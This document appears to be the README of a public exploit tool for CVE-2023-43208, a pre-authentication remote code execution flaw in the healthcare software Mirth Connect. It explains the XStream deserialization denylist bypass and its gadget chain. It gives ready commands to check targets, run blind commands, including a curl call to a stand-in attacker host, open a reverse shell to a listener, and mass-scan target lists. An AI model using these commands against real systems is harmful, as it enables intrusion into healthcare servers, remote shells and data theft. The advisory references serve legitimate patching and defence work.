Share
## https://sploitus.com/exploit?id=84AFA095-B694-5F7E-A4BF-860A4BAD21FD
# CVE-2023-43208 โ€” Mirth Connect Pre-Auth RCE

Pre-authenticated Remote Code Execution in **NextGen Healthcare Mirth Connect  **CVSS 9.8 (Critical)** โ€” Patch bypass of CVE-2023-37679

## Overview

Mirth Connect uses the Java XStream library to deserialize XML payloads on the `/api/users` endpoint **without authentication**. The original fix (CVE-2023-37679) introduced a denylist of dangerous classes, but this was bypassed using `EventBindingInvocationHandler` from Apache Commons Lang3 combined with the Commons Collections4 `InvokerTransformer` chain.

Fixed in Mirth Connect **4.4.1** by switching from denylist to allowlist.

## Requirements

```bash
pip install requests
```

Python 3.10+ (uses `match` statements).

## Usage

### Check if a target is vulnerable

```bash
python3 exploit.py check -t https://target:8443
```

### Execute a command (blind RCE โ€” no output)

```bash
python3 exploit.py exec -t https://target:8443 -c "id"
python3 exploit.py exec -t https://target:8443 -c "curl http://attacker/pwned"
```

### Pop a reverse shell

```bash
# Terminal 1 (or let the script handle the listener):
python3 exploit.py shell -t https://target:8443 --lhost 10.10.10.10 --lport 4444

# For better shell experience, use rlwrap:
rlwrap python3 exploit.py shell -t https://target:8443 --lhost 10.10.10.10 --lport 4444
```

### Scan multiple targets

```bash
python3 exploit.py scan -f targets.txt -o vulnerable.txt -T 30
```

## Attack Chain

```
POST /api/users  (no auth)
     โ”‚
     โ–ผ
XStream deserializes XML payload
     โ”‚
     โ–ผ
sorted-set triggers Comparable.compareTo()
     โ”‚
     โ–ผ
dynamic-proxy โ†’ EventBindingInvocationHandler (bypasses denylist)
     โ”‚
     โ–ผ
ChainedTransformer.transform()
     โ”‚
     โ–ผ
ConstantTransformer(Runtime.class)
  โ†’ InvokerTransformer("getRuntime")
    โ†’ InvokerTransformer("invoke")
      โ†’ InvokerTransformer("exec", )
           โ”‚
           โ–ผ
      OS command execution as Mirth Connect service user
```

## Disclaimer

This tool is provided for **authorized security testing and educational purposes only**. Unauthorized access to computer systems is illegal. Always obtain proper authorization before testing.

## References

- [NVD โ€” CVE-2023-43208](https://nvd.nist.gov/vuln/detail/CVE-2023-43208)
- [Horizon3.ai โ€” Writeup](https://www.horizon3.ai/attack-research/disclosures/nextgen-mirth-connect-pre-auth-rce-cve-2023-43208/)
- [CISA KEV Catalog](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)